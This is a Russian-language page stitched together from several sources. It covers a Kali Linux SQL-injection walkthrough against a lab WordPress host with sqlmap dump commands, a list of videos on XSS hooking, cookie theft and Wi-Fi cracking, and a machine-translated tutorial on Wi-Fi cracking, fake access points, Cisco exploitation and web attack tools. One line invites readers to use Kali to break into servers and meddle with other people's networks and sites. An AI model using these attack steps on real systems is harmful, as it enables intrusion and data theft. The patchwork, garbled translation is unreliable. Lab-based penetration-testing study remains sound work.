Kali linux мануал на русском

Время на прочтение
2 мин

Количество просмотров 126K

14 декабря будет запущена новая «Test lab» — лаборатория тестирования на проникновение, имитирующая работу реальной корпоративной сети, в которой каждый желающий сможет проверить свои навыки тестирования на проникновение. Поскольку порог вхождения для выполнения всех заданий лаборатории достаточно высокий, мы решили выпустить небольшой гайд для начинающих по работе с Kali Linux 2018.4 — одним из самых популярных пентест-дистрибутивов, разработанного как преемник BackTrack и основного на Debian.

Причина популярности простая – довольно дружелюбный интерфейс и наличие необходимых инструментов для пентеста “из коробки”. Инструменты распределены по категориям, что очень удобно. Имеются варианты установки на АРМ, например, Raspberry Pi 3, а также на мобильные платформы под управлением Android. Я сейчас говорю про Kali NetHunter – тот же Kali, который практически без изменений устанавливается поверх Android и работающий внутри chroot-окружения.

Получаем токен, используя SQLi

По легенде у нас есть некий хост test.lab. Наша задача — определить уязвимости и выполнить их эксплуатацию.

Начнем с разведки — выполним сканирование портов: nmap -v test.lab

Сканирование в режиме по умолчанию результатов не дало, произведем сканирование всех портов: nmap -v -p 1-65535 192.168.60.13

Отлично, видим открытый 9447 порт и попробуем идентифицировать сервисы:
nmap -v -sV -p 9447 192.168.60.13
-sV – ключ для определения версий сервисов
-p – указание конкретного порта или диапазона портов

На порту 9447 доступно веб-приложение:


Используя инструмент nikto, определим, что вероятнее всего используется CMS WordPress:
nikto -host test.lab:9447

Проверим приложение, используя WPScan: wpscan --url http://test.lab:9447

Сканирование не показало, применяются ли какие-то уязвимые плагины. Попробуем добавить ключ для поиска плагинов —plugins-detection с параметром aggressive.
wpscan --url http://test.lab:9447 --plugins-detection aggressive

Нам удалось обнаружить плагин WP Symposium 15.5.1.Для данной версии имеется уязвимость SQL Injection, и также в выводе представлены ссылки на базы с описанием уязвимости, где мы и будем искать информацию.

Мы нашли способ эксплуатировать уязвимость на www.exploit-db.com/exploits/37824

Теперь нужно проверить ее, подставив этот параметр к нашему url.

Используя Burp Suite, посмотрим, какие запросы приходят при обращении к этому адресу:

Скопируем этот GET запрос в файл и передадим его в sqlmap с параметром -r, добавив ключ уязвимого параметра -p “size” и —dbs для нахождения баз данных.
sqlmap -r qwe -p “size” --dbs

В итоге мы получили несколько баз. Проверим содержимое базы wordpress_test и найденных таблиц:
sqlmap -r qwe -D wordpress_test --table

sqlmap -r qwe -D wordpress_test -T wp_posts --dump

В таблице wp_post в одной из скрытых записей нам удалось найти токен Y@u-wIn!!!.

Использование Nemeisida WAF не позволит выполнить эксплуатацию подобной уязвимости.

Kali Linux является очень мощным дистрибутивом для пентеста. Мы рассмотрели пару простых из ~600 доступных инструментов, которые найдут свое применение у любого — от начинающего до профессионала.

Соблюдайте законодательство и до встречи в Test lab v.12.

Если нужно получить доступ к серверу, поправить работоспособность чужой сети или побаловаться с чьим-то сайтом – Kali Linux вам в помощь.

В этой статье будем рассматривать отличный видеокурс по взлому сайтов, SQL-инъекциям и прочим интересным штукам, которые наиболее удобно реализовать с Kali Linux.

В первой части курса рассматривается установка дистрибутива Kali Linux на виртуальную машину VMWare со всеми встроенными инструментами. Для тренировок будет использоваться виртуальная машина OWASP Broken Web Application, в которой находятся сайты с уязвимостями: их-то мы и будем мучить. Также обновим операционную систему.

https://www.youtube.com/watch?v=rMnYTZFRAqQ

Рекомендуем к просмотру видео по установке Kali Linux с флешки:

Ну и конечно же установим Kali Linux на эту самую флешку, сохранив при этом все пользовательские данные:

Удаленный взлом компьютера через интернет (часть 1)

Небольшое ознакомительное видео о том, что такое XSS:

https://www.youtube.com/watch?v=3YxMZ8pCPsY

В следующем ролике автор рассказывает про XSS-уязвимость сайта, через которую будет взламываться удаленный компьютер. XSS – очень старая, но до сих пор работающая технология взлома. Если у вас есть свой сайт, проверьте, не выполняет ли он пользовательские скрипты, если их ввести, например, в поле комментария? Через эту брешь при помощи инструмента Beef было взломано множество ресурсов…

https://www.youtube.com/watch?v=3v4bKlVkB40

А данный видеоурок позволит рассмотреть работу XSS-атаки изнутри:

Удаленный взлом компьютера через интернет (часть 2)

Это вторая часть обучающего материала про межсайтовый скриптинг. В ролике автор показывает, как исполнить скриптовую Reflected-атаку на пользователя через сайт с брешью в безопасности. С помощью инструмента Burp Suite получаем хеш ссылки, по которой открывается скрипт и подсаживаем наш ужасный hook ничего не подозревающему пользователю. Когда пользователь откроет целевую страницу, его компьютер окажется в наших руках.

https://www.youtube.com/watch?v=HAxPiuqSW2Q

Еще один полезный туториал по взлому с использованием Burp Suite, но без необходимости использовать платный инструментарий:

Что такое cookies в браузере

Автор рассматривает базовые понятия о cookies и средства безопасности в самом браузере для защиты “печенек” от злоумышленника. Будем воровать cookies из браузера Chrome того пользователя, которого взломали на прошлом уроке. Используется по-прежнему многофункциональный инструмент Beef и JS-скрипты, чтобы представиться сайту под именем нашего тестового пользователя.

https://www.youtube.com/watch?v=MfbiSfS10jQ

Другой способ украсть «куки» с использованием Kali Linux:

https://www.youtube.com/watch?v=rhOMonKhmRM

Взлом Wi-Fi пароля WPA2

В этом ролике автор будет показывать, как с помощью встроенного в Kali Linux инструмента Aircrack-ng можно получить доступ к защищенному роутеру. Будет рассмотрено, как создать флешку с Live CD с Linux-ом для тех случаев, когда на вашем компьютере нет беспроводного адаптера или он не поддерживается Aircrack-ng. Взлому будет подвергаться роутер на котором включен MAC-фильтр, шифрование WPA2 + имя сети будет скрыто.

https://www.youtube.com/watch?v=TUcMbbG-XH8

Еще одно видео по взлому Wi-Fi

Мы также подобрали видео, которое не обрывается. Автор максимально доступно объясняет возможные уязвимости и способы их использования. Вы узнаете, почему Wi-Fi сеть никак не может быть на 100% защищенной.

Взлом WEB-сайтов: SQL-инъекции (часть 1)

В первой части этого урока будем разбираться, как “подсунуть” целевому серверу логин и пароль для входа, если мы этого не знаем. Данный распространенный вид атаки подразумевает под собой обман SQL-базы через подстановку передаваемых параметров. Для этого могут понадобиться дополнительные знания ответов web-сервера и понимание базовых вещей в MySQL.

https://www.youtube.com/watch?v=xD5de1vRXWw

Взлом WEB-сайтов: SQL-инъекции (часть 2)

Продолжаем изучать процесс взлома сайта через логин и пароль. В этом уроке используется локальное прокси браузера и встроенный инструмент Burp Suite для перехвата отправляемых параметров из web-сервера в базу данных. Для понимания урока и облегчения применения знаний на практике хорошо бы знать тонкости работы запросов GET/POST, а также углубленное понимание SQL-синтаксиса.

https://www.youtube.com/watch?v=ZAGAZxcYrC4

Второе видео по SQL-инъекциям хоть и короткое, но очень информативное:

Также можно обратиться к развернутой лекции:

Взлом пароля пользователя

В этом ролике будем получать пароли пользователей Windows. Из-за того, что пароли хранятся в виде одностороннего шифрования, понадобится специальный инструмент, чтобы расшифровать строку и получить искомое. Использоваться будет программка Cain and Abel. Эту манипуляцию нельзя назвать взломом, а скорее расшифровкой, но несмотря на это – информация полезная.

https://www.youtube.com/watch?v=hDuF1-Ls0sY

Также предлагаем ознакомиться с другими нашими статьями, которые посвящены взлому паролей:

  • 5 способов взлома страницы ВКонтакте
  • Кража паролей: как наши учетные записи уводят через npm-пакет

Другие материалы по теме:

  • Используем чужой интернет или «Скажи мне свой пароль от Wi-Fi»
  • Лучшие хакерские ресурсы: ТОП-10 YouTube каналов
  • 9 ресурсов об уязвимостях в вебе
  • Как стать настоящим хакером или Capture The Flag

Kali Linux – установка и настройка

Kali Linux – один из лучших пакетов защиты этического хакера, содержащий набор инструментов, разделенных по категориям. Это открытый исходный код, и его официальная веб-страница https://www.kali.org.

Как правило, Kali Linux можно установить на компьютере в качестве операционной системы, в качестве виртуальной машины, которую мы обсудим в следующем разделе. Установка Kali Linux – это практичный вариант, поскольку он предоставляет больше возможностей для работы и объединения инструментов. Вы также можете создать живой загрузочный CD или USB. Все это можно найти по следующей ссылке: https://www.kali.org/downloads/

BackTrack был старой версией дистрибутива Kali Linux. Последний выпуск – Kali 2016.1, и он обновляется очень часто.

Дистрибутив Linux

Чтобы установить Kali Linux –

  • Сначала мы скачаем Virtual Box и установим его.
  • Позже мы загрузим и установим дистрибутив Kali Linux.

Загрузите и установите виртуальную коробку

Виртуальная коробка особенно полезна, когда вы хотите протестировать что-то в Kali Linux, в чем вы не уверены. Запускать Kali Linux на виртуальной коробке безопасно, если вы хотите поэкспериментировать с неизвестными пакетами или когда вы хотите протестировать код.

С помощью Virtual Box вы можете установить Kali Linux на свою систему (а не прямо на жесткий диск) вместе со своей основной ОС, которая может быть MAC или Windows или другой разновидностью Linux.

Давайте разберемся, как вы можете загрузить и установить Virtual Box в вашей системе.

Шаг 1 – Чтобы загрузить, перейдите по ссылке https://www.virtualbox.org/wiki/Downloads . В зависимости от вашей операционной системы, выберите правильный пакет. В этом случае он будет первым для Windows, как показано на следующем снимке экрана.

Первая страница виртуальной коробки

Шаг 2 – Нажмите Далее .

Настроить

Шаг 3 – На следующей странице вы сможете выбрать место, куда вы хотите установить приложение. В этом случае оставим его по умолчанию и нажмите « Далее» .

Пользовательская настройка

Шаг 4 – Нажмите « Далее», и появится следующий скриншот пользовательской настройки . Выберите функции, которые вы хотите установить, и нажмите Далее.

Пользовательские функции

Шаг 5 – Нажмите Да, чтобы продолжить установку.

Сетевой интерфейс

Шаг 6 – Появится экран готовности к установке . Нажмите Установить.

Готов к установке

Шаг 7 – Нажмите кнопку Готово .

Полная установка

Приложение Virtual Box откроется, как показано на следующем снимке экрана. Теперь мы готовы установить остальные хосты для этого руководства, и это также рекомендуется для профессионального использования.

Виртуальный менеджер

Установить Кали Linux

Теперь, когда мы успешно установили Virtual Box, давайте перейдем к следующему шагу и установим Kali Linux.

Шаг 1 – Загрузите пакет Kali Linux со своего официального сайта: https://www.kali.org/downloads/

Наступательная безопасность

Шаг 2 – Нажмите VirtualBox → Новый, как показано на следующем скриншоте.

Машина Новая

Шаг 3 – Выберите правильный файл виртуального жесткого диска и нажмите Открыть .

Файл жесткого диска

Шаг 4 – появится следующий скриншот. Нажмите кнопку Создать .

Создайте

Шаг 5 – Запустите Kali OS. Имя пользователя по умолчанию – root, а пароль – toor .

Кали ОС

Обновление Кали

Важно продолжать обновлять Kali Linux и его инструменты до новых версий, чтобы оставаться работоспособным. Ниже приведены инструкции по обновлению Kali.

Шаг 1 – Перейдите в Приложение → Терминал. Затем введите «apt-get update», и обновление будет выполнено, как показано на следующем снимке экрана.

заявка

Терминал

Шаг 2 – Теперь, чтобы обновить инструменты, введите «apt-get upgrade», и новые пакеты будут загружены.

Обновить

Шаг 3 – Он спросит, хотите ли вы продолжить. Введите «Y» и «Enter» .

Введите Y

Шаг 4 – Чтобы обновить операционную систему до более новой версии, введите «apt-get distupgrade» .

Dist Upgrade

Лабораторная установка

В этом разделе мы настроим другую машину для тестирования, чтобы выполнять тесты с помощью инструментов Kali Linux.

Шаг 1 – Загрузите Metasploitable , который является машиной Linux. Его можно загрузить с официальной веб-страницы Rapid7 : https://information.rapid7.com/metasploitabledownload.html?LS=1631875&CS=web.

Metasploitable

Шаг 2 – Зарегистрируйтесь, указав свои данные. После заполнения вышеуказанной формы мы можем загрузить программное обеспечение.

регистрирующий

Шаг 3 – Нажмите VirtualBox → Новый .

Машина Новая

Шаг 4 – Нажмите «Использовать существующий файл виртуального жесткого диска» . Найдите файл, в который вы скачали Metasploitable, и нажмите « Открыть» .

Существующий жесткий диск

Шаг 5 – Появится экран для создания виртуальной машины. Нажмите «Создать».

Всплывающие окна машины

Имя пользователя по умолчанию – msfadmin, а пароль – msfadmin .

Данные для входа

Kali Linux – инструменты сбора информации

В этой главе мы обсудим инструменты сбора информации Kali Linux.

NMAP и ZenMAP

NMAP и ZenMAP являются полезными инструментами для фазы сканирования Ethical Hacking в Kali Linux. NMAP и ZenMAP – практически один и тот же инструмент, однако NMAP использует командную строку, в то время как ZenMAP имеет графический интерфейс.

NMAP – это бесплатная утилита для обнаружения сети и аудита безопасности. Многие системные и сетевые администраторы также находят это полезным для таких задач, как инвентаризация сети, управление расписаниями обновления служб и мониторинг времени работы хоста или службы.

NMAP использует необработанные IP-пакеты новыми способами, чтобы определить, какие хосты доступны в сети, какие сервисы (имя и версия приложения) предлагают эти хосты, какие операционные системы (и версии ОС) они работают, какой тип фильтров / брандмауэров пакетов используются и т. д.

Теперь давайте пойдем шаг за шагом и узнаем, как использовать NMAP и ZenMAP.

Шаг 1 – Чтобы открыть, перейдите в Приложения → 01-Сбор информации → nmap или zenmap.

Nmap ZenMap

Шаг 2 – Следующим шагом является определение типа / версии ОС целевого хоста. На основании справки, указанной в NMAP, параметр определения типа / версии ОС является переменной «-O». Для получения дополнительной информации используйте эту ссылку: https://nmap.org/book/man-os-detection.html

Команда, которую мы будем использовать, –

nmap -O 192.168.1.101

На следующем снимке экрана показано, где вам нужно ввести вышеуказанную команду, чтобы увидеть вывод Nmap:

Nmap Output

Шаг 3 – Затем откройте порты TCP и UDP. Чтобы просканировать все порты TCP на основе NMAP, используйте следующую команду –

nmap -p 1-65535 -T4  192.168.1.101 

Где параметр «–p» указывает все порты TCP, которые должны быть проверены. В этом случае мы сканируем все порты, и «-T4» – это скорость сканирования, на которой должен работать NMAP.

Ниже приведены результаты. Зеленым цветом обозначены все открытые порты TCP, а красным – все закрытые порты. Однако NMAP не отображается, так как список слишком длинный.

Закрытые порты

Stealth Scan

Стелс-сканирование или SYN также называется полуоткрытым сканированием , поскольку оно не завершает трехстороннее рукопожатие TCP. Хакер отправляет пакет SYN цели; если кадр SYN / ACK получен обратно, предполагается, что цель завершит соединение, а порт прослушивает. Если RST получен обратно от цели, то предполагается, что порт не активен или закрыт.

Полуоткрытое сканирование

Syn Packet

Теперь, чтобы увидеть SYN-сканирование на практике, используйте параметр –sS в NMAP. Ниже приводится полная команда –

nmap -sS -T4 192.168.1.101 

На следующем снимке экрана показано, как использовать эту команду –

Команда ZenMap

Searchsploit

Searchsploit – это инструмент, который помогает пользователям Kali Linux осуществлять прямой поиск с помощью командной строки из архива базы данных Exploit.

Чтобы открыть его, перейдите в Приложения → 08-Эксплуатационные инструменты → searchsploit, как показано на следующем снимке экрана.

Searchsploit

После открытия терминала введите « searchsploit exploit index name ».

Имя индекса эксплойта

DNS инструменты

В этом разделе мы узнаем, как использовать некоторые инструменты DNS, встроенные в Kali. По сути, эти инструменты помогают при передаче зон или решении проблем с IP-адресами домена.

dnsenum.pl

Первым инструментом является dnsenum.pl, который представляет собой сценарий PERL, помогающий подключить MX, A и другие записи к домену.

Нажмите на терминал на левой панели.

Терминал Левая панель

Введите «имя домена dnsenum», и все записи будут показаны. В этом случае он показывает записи.

Доменное имя

DNSMAP

Вторым инструментом является DNSMAP, который помогает найти телефонные номера, контакты и другой поддомен, связанный с этим доменом, который мы ищем. Ниже приведен пример.

Нажмите на терминал как в верхнем разделе, затем напишите «имя домена dnsmap»

Карта DNS

dnstracer

Третий инструмент – это dnstracer , который определяет, откуда данный сервер доменных имен (DNS) получает информацию для данного имени хоста.

Нажмите на терминал, как в верхнем разделе, затем введите «имя домена dnstracer» .

DnsTracer

LBD Инструменты

Инструменты LBD (Load Balancing Detector) очень интересны, так как они обнаруживают, использует ли данный домен балансировку нагрузки DNS и / или HTTP. Это важно, потому что если у вас есть два сервера, один или другой может не обновляться, и вы можете попытаться использовать его. Ниже приведены инструкции по его использованию.

Сначала нажмите на терминал на левой панели.

Терминал Левая панель

Затем введите «имя домена lbd» . Если он выдает результат «FOUND», это означает, что сервер имеет баланс нагрузки. В этом случае результат «НЕ НАЙДЕН».

Доменное имя LBD

hping3

Hping3 широко используется этическими хакерами. Он почти аналогичен инструментам ping, но более продвинут, поскольку он может обходить фильтр брандмауэра и использовать протоколы TCP, UDP, ICMP и RAW-IP. Он имеет режим traceroute и возможность отправлять файлы между закрытым каналом.

Нажмите на терминал на левой панели.

Терминал Левая панель

Введите «hping3 –h», который покажет, как использовать эту команду.

hping3

Другая команда – «домен или IP-параметр hping3»

Параметр IP

Kali Linux – Инструменты анализа уязвимостей

В этой главе мы узнаем, как использовать некоторые инструменты, которые помогают нам использовать устройства или приложения для получения доступа.

Инструменты Cisco

Kali имеет несколько инструментов, которые можно использовать для эксплуатации маршрутизатора Cisco. Одним из таких инструментов является факел Cisco, который используется для массового сканирования, снятия отпечатков пальцев и эксплуатации.

Давайте откроем консоль терминала, нажав на левую панель.

Терминал Левая панель

Затем введите «cisco-torch –parameter IP хоста», и если ничего не найдено для использования, будет показан следующий результат.

Cisco Torch

Чтобы увидеть, какие параметры можно использовать, введите «cisco-torch?»

Параметр Cisco

Инструмент аудита Cisco

Это сценарий PERL, который сканирует маршрутизаторы Cisco на наличие общих уязвимостей. Чтобы использовать его, снова откройте терминал на левой панели, как показано в предыдущем разделе, и введите «CAT –h hostname or IP» .

Вы можете добавить параметр порта «-p», как показано на следующем снимке экрана, который в данном случае равен 23, чтобы переборить его.

Параметр порта

Cisco Global Exploiter

Cisco Global Exploiter (CGE) – это современный, простой и быстрый инструмент тестирования безопасности. С помощью этих инструментов вы можете выполнять несколько типов атак, как показано на следующем снимке экрана. Однако будьте осторожны при тестировании в реальной среде, поскольку некоторые из них могут привести к сбою устройства Cisco. Например, вариант вариант может остановить услуги.

Устройство Cisco

Чтобы использовать этот инструмент, введите «cge.pl IPaddress номер уязвимости»

На следующем снимке экрана показан результат теста, выполненного на маршрутизаторе Cisco для уязвимости № 3 из списка выше. Результат показывает, что уязвимость была успешно использована.

Cisco Router

ПОСТЕЛЬ

BED – это программа, предназначенная для проверки демонов на возможные переполнения буфера, форматирование строк и т. Д. и др.

Проверьте Демонов

В этом случае мы будем тестировать машину тестирования с IP 192.168.1.102 и протоколом HTTP.

Команда будет «bed –s HTTP –t 192.168.1.102», и тестирование будет продолжено.

тестирование

Kali Linux – беспроводные атаки

В этой главе мы узнаем, как использовать инструменты взлома Wi-Fi, встроенные в Kali Linux. Тем не менее, важно, чтобы у беспроводной карты была поддержка режима мониторинга.

Папоротник Wifi Cracker

Взломщик Fern Wifi – это один из инструментов, который Кали может взломать.

Перед тем, как открыть Fern, мы должны включить беспроводную карту в режим мониторинга. Для этого наберите «airmon-ng start wlan-0» в терминале.

Airmon Ng

Теперь откройте Fern Wireless Cracker.

Шаг 1 – Приложения → Нажмите «Беспроводные атаки» → «Fern Wireless Cracker».

Fern Wireless Cracker

Шаг 2 – Выберите беспроводную карту, как показано на следующем снимке экрана.

Беспроводная карта

Шаг 3 – Нажмите «Сканировать точки доступа».

Точка доступа

Шаг 4 – После завершения сканирования, он покажет все найденные беспроводные сети. В этом случае были обнаружены только «сети WPA».

Сеть WPA

Шаг 5 – Нажмите на сети WPA, как показано на скриншоте выше. Он показывает все найденные беспроводные сети. Как правило, в сетях WPA он выполняет атаки по словарю как таковые.

Шаг 6 – Нажмите «Обзор» и найдите список слов для использования при атаке.

Список слов

Шаг 7 – Нажмите «Wifi Attack».

Wi-Fi-атака

Шаг 8 – После завершения атаки по словарю, он нашел пароль и покажет, как показано на следующем снимке экрана.

Атака по словарю

кисмет

Kismet – это инструмент анализа сети WIFI. Это детектор беспроводной сети уровня 802.11, анализатор и система обнаружения вторжений. Он будет работать с любой беспроводной картой, поддерживающей режим необработанного мониторинга (rfmon), и может прослушивать трафик 802.11a / b / g / n. Он идентифицирует сети, собирая пакеты, а также скрытые сети.

Чтобы использовать его, включите беспроводную карту в режим мониторинга и для этого введите «airmon-ng start wlan-0» в терминале.

Начать Wlan

Давайте узнаем, как использовать этот инструмент.

Шаг 1 – Чтобы запустить его, откройте терминал и введите «kismet».

запуск

Шаг 2 – Нажмите «ОК».

кисмет

Шаг 3 – Нажмите «Да», когда появится запрос на запуск Kismet Server. В противном случае он перестанет функционировать.

Запустить сервер

Шаг 4 – Параметры запуска, оставьте по умолчанию. Нажмите «Пуск».

Оставить по умолчанию

Шаг 5 – Теперь он покажет таблицу с просьбой определить беспроводную карту. В таком случае нажмите Да.

Определить таблицу

Шаг 6 – В этом случае беспроводным источником является «wlan0» . Это нужно будет написать в разделе «Intf» → нажать «Добавить».

Wirless Source

Шаг 7 – Он начнет прослушивать сети Wi-Fi, как показано на следующем снимке экрана.

сети

Шаг 8 – Нажмите на любую сеть, она выдаст беспроводные данные, как показано на следующем снимке экрана.

Беспроводная сеть

GISKismet

GISKismet – это инструмент беспроводной визуализации для практического представления данных, собранных с помощью Kismet. GISKismet хранит информацию в базе данных, чтобы мы могли запрашивать данные и генерировать графики с использованием SQL. В настоящее время GISKismet использует SQLite для базы данных и файлы GoogleEarth / KML для построения графиков.

Давайте узнаем, как использовать этот инструмент.

Шаг 1 – Чтобы открыть GISKismet, перейдите по ссылке: Приложения → Нажмите «Беспроводные атаки» → giskismet.

Giskismet

Как вы помните в предыдущем разделе, мы использовали инструмент Kismet для изучения данных о беспроводных сетях и всех этих данных Kismet, упакованных в файлы netXML.

Шаг 2. Чтобы импортировать этот файл в Giskismet, введите «root @ kali: ~ # giskismet -x Kismetfilename.netxml», и он начнет импорт файлов.

Импорт файлов

После импорта мы можем импортировать их в Google Планета Земля, которые мы нашли ранее.

Шаг 3. Предполагая, что мы уже установили Google Планета Земля, мы нажимаем Файл → Открыть файл, созданный Giskismet → Нажмите «Открыть».

Гугл Земля

Следующая карта будет отображаться.

карта

Призрачный Фишер

Ghost Phisher – это популярный инструмент, который помогает создавать поддельные точки беспроводного доступа, а затем создавать атаки типа «человек посередине».

Шаг 1 – Чтобы открыть его, нажмите Приложения → Беспроводные атаки → «Призрачный фишинг».

Призрачный Фишер

Шаг 2 – После его открытия мы настроим поддельную точку доступа, используя следующую информацию.

  • Вход беспроводного интерфейса: wlan0
  • SSID: имя беспроводной точки доступа
  • IP-адрес: IP-адрес, который будет иметь точка доступа
  • WAP: пароль, который будет иметь этот SSID для подключения

Открытие Ghost Phisher

Шаг 3 – Нажмите кнопку Пуск .

Wifite

Это еще один инструмент для взлома беспроводных сетей, который атакует несколько зашифрованных сетей WEP, WPA и WPS.

Во-первых, беспроводная карта должна находиться в режиме мониторинга.

Шаг 1 – Чтобы открыть его, перейдите в Приложения → Беспроводная атака → Wifite.

Wifite

Шаг 2 – Введите «wifite –showb» для сканирования сетей.

Wifite Showb

Сканирование сети

Шаг 3 – Чтобы начать атаковать беспроводные сети, нажмите Ctrl + C.

нападающий

Шаг 4 – Введите «1», чтобы взломать первый беспроводной.

Crack First

Шаг 5 – После завершения атаки ключ будет найден.

Ключ найден

Kali Linux – тестирование проникновения на сайт

В этой главе мы узнаем о тестировании на проникновение веб-сайтов, предлагаемом Kali Linux.

Vega Usage

Vega – это бесплатная платформа для сканирования и тестирования с открытым исходным кодом, предназначенная для проверки безопасности веб-приложений. Vega может помочь вам найти и проверить SQL-инъекцию, межсайтовый скриптинг (XSS), непреднамеренно раскрытую конфиденциальную информацию и другие уязвимости. Он написан на Java, на основе графического интерфейса и работает в Linux, OS X и Windows.

Vega включает в себя автоматический сканер для быстрых тестов и перехватывающий прокси для тактического осмотра. Vega может быть расширена с помощью мощного API на языке Интернета: JavaScript. Официальная веб-страница https://subgraph.com/vega/

подграф

Шаг 1 – Чтобы открыть Vega, выберите Приложения → 03-Анализ веб-приложений → Vega.

Вега

Шаг 2 – Если вы не видите приложение в пути, введите следующую команду.

подграф

Шаг 3 – Чтобы начать сканирование, нажмите знак «+».

Подграф Вега

Шаг 4 – Введите URL веб-страницы, который будет сканироваться. В этом случае это метапроизводимая машина → нажмите «Далее».

Введите URL страницы

Шаг 5 – Отметьте все поля модулей, которыми вы хотите управлять. Затем нажмите «Далее».

Модульные коробки

Шаг 6 – Нажмите «Далее» еще раз на следующем снимке экрана.

Далее снова

Шаг 7 – Нажмите «Готово».

Кнопка Готово

Шаг 8 – Если появится следующая таблица, нажмите «Да».

Следовать редирект

Сканирование будет продолжено, как показано на следующем снимке экрана.

Сканер Прогресс

Шаг 9 – После того, как сканирование завершено, на левой нижней панели вы можете увидеть все результаты, которые классифицированы в соответствии с серьезностью. Если вы щелкните по нему, вы увидите все детали уязвимостей на правой панели, такие как «Запрос», «Обсуждение», «Воздействие» и «Исправление».

Левая панель вниз

ZapProxy

ZAP-OWASP Zed Attack Proxy – это простой в использовании интегрированный инструмент тестирования на проникновение для поиска уязвимостей в веб-приложениях. Это интерфейс Java.

Шаг 1 – Чтобы открыть ZapProxy, перейдите в Приложения → 03-Анализ веб-приложений → owaspzap.

ZapProxy

Шаг 2 – Нажмите «Принять».

Лицензионная версия

ZAP начнет загружаться.

OWASP Zap

Шаг 3 – Выберите один из вариантов, как показано на следующем снимке экрана, и нажмите «Пуск».

Выберите параметры

Следующая сеть является метасплочной с IP: 192.168.1.101

Web Metasploitable

Шаг 4. Введите URL-адрес веб-сайта тестирования в поле «URL-адрес для атаки» → нажмите «Атака».

Url Attack

После завершения сканирования в верхней левой панели вы увидите все просканированные сайты.

На левой панели «Оповещения» вы увидите все полученные данные вместе с описанием.

Оповещения

Шаг 5 – Нажмите «Паук», и вы увидите все отсканированные ссылки.

паук

Использование инструментов базы данных

sqlmap

sqlmap – это инструмент для тестирования на проникновение с открытым исходным кодом, который автоматизирует процесс обнаружения и использования недостатков SQL-инъекций и захвата серверов баз данных. Он поставляется с мощным механизмом обнаружения, множеством нишевых функций для окончательного тестера проникновения и широким диапазоном переключателей, начиная от дактилоскопии базы данных, за выборку данных из базы данных, до доступа к базовой файловой системе и выполнения команд в операционной системе через внешнюю систему. зонные соединения.

Давайте узнаем, как использовать sqlmap.

Шаг 1 – Чтобы открыть sqlmap, перейдите в Приложения → Оценка базы данных → sqlmap.

SQLMap

Веб-страница, имеющая уязвимые параметры для SQL-инъекций, является метасложной.

SQL-инъекция

Шаг 2. Чтобы начать тестирование SQL-инъекций, введите «sqlmap – u URL-адрес жертвы»

Url Victim

Шаг 3 – Из результатов вы увидите, что некоторые переменные уязвимы.

Переменные результаты

sqlninja

sqlninja – это инъекция SQL в Microsoft SQL Server для полного доступа к графическому интерфейсу. sqlninja – это инструмент, предназначенный для использования уязвимостей SQL-инъекций в веб-приложении, использующем Microsoft SQL Server в качестве серверной части. Полную информацию об этом инструменте можно найти на http://sqlninja.sourceforge.net/

Шаг 1 – Чтобы открыть sqlninja, перейдите в Приложения → Оценка базы данных → sqlninja.

Оценка базы данных

Инструменты сканирования CMS

WPScan

WPScan – это сканер уязвимостей WordPress черного ящика, который можно использовать для сканирования удаленных установок WordPress на наличие проблем безопасности.

Шаг 1 – Чтобы открыть WPscan, перейдите в Приложения → 03-Анализ веб-приложений → «wpscan».

Веб приложение

Появится следующий скриншот.

Wpscan

Шаг 2. Чтобы проверить сайт на наличие уязвимостей, введите «wpscan –u URL веб-страницы» .

Если сканер не обновляется, он попросит вас обновить. Я рекомендую это сделать.

Обновление сканера

Как только сканирование начнется, вы увидите результаты. На следующем снимке экрана уязвимости обозначены красной стрелкой.

Красная стрелка

Сканирование начинается

Joomscan

Joomla, вероятно, является наиболее широко используемой CMS из-за своей гибкости. Для этой CMS это сканер Joomla. Это поможет веб-разработчикам и веб-мастерам выявить возможные слабые места безопасности на развернутых сайтах Joomla.

Шаг 1 – Чтобы открыть его, просто нажмите левую панель на терминале, затем «joomscan – параметр» .

Шаг 2 – Чтобы получить справку по использованию, введите «joomscan /?»

Joomscan

Шаг 3 – Чтобы начать сканирование, введите «joomscan –u URL-адрес жертвы».

OWASP

Результаты будут отображаться, как показано на следующем снимке экрана.

уязвимость

Предложение

Инструменты сканирования SSL

TLSSLed – это сценарий оболочки Linux, используемый для оценки безопасности реализации целевого веб-сервера SSL / TLS (HTTPS). Он основан на sslscan, тщательном сканере SSL / TLS, основанном на библиотеке openssl, и на инструменте командной строки «openssl s_client» .

Текущие тесты включают в себя проверку того, поддерживает ли цель протокол SSLv2, шифр NULL, слабые шифры на основе длины ключа (40 или 56 бит), наличие надежных шифров (например, AES), если цифровой сертификат подписан MD5, и текущие возможности пересмотра SSL / TLS.

Чтобы начать тестирование, откройте терминал и введите «tlssled URL port» . Он начнет проверять сертификат, чтобы найти данные.

Tissled

Вы можете видеть, что сертификат действителен до 2018 года, как показано зеленым на следующем снимке экрана.

сертификат

w3af

w3af – это платформа для атаки и аудита веб-приложений, целью которой является выявление и использование всех уязвимостей веб-приложений. Этот пакет предоставляет графический интерфейс пользователя (GUI) для платформы. Если вам нужно только приложение командной строки, установите w3af-console.

Фреймворк был назван «metasploit for the web», но на самом деле он намного больше, поскольку он также обнаруживает уязвимости веб-приложений с помощью методов сканирования «черного ящика». Ядро w3af и его плагины полностью написаны на Python. Проект имеет более 130 плагинов, которые идентифицируют и используют SQL-инъекции, межсайтовый скриптинг (XSS), удаленное включение файлов и многое другое.

Шаг 1 – Чтобы открыть его, перейдите в Приложения → 03-Анализ веб-приложений → Нажмите w3af.

Приложение W3af

Шаг 2 – В поле «Цель» введите URL-адрес жертвы, который в этом случае будет метасовместимым веб-адресом.

цель

Шаг 3 – Выберите профиль → Нажмите «Пуск».

Начало профиля

Шаг 4 – Перейдите в «Результаты», и вы можете увидеть результаты с деталями.

Нахождение результатов

Kali Linux – Инструменты эксплуатации

В этой главе мы узнаем о различных инструментах эксплуатации, предлагаемых Kali Linux.

Metasploit

Как мы упоминали ранее, Metasploit является продуктом Rapid7, и большинство ресурсов можно найти на их веб-странице www.metasploit.com . Он доступен в двух версиях – коммерческая и бесплатная. Различий между этими двумя версиями не так много, в этом случае мы будем использовать версию сообщества (бесплатно).

Как этический хакер, вы будете использовать «Kali Ditribution», в которую встроена версия сообщества Metasploit, а также другие этические хакерские инструменты, которые очень удобны благодаря экономии времени на установку. Однако, если вы хотите установить в качестве отдельного инструмента, это приложение, которое может быть установлено в операционных системах, таких как Linux, Windows и OS X.

Сначала откройте консоль Metasploit в Кали. Затем перейдите в Приложения → Инструменты эксплуатации → Metasploit.

Инструменты эксплуатации

После его запуска вы увидите следующий экран, где версия Metasploit подчеркнута красным.

Версия Metasploit

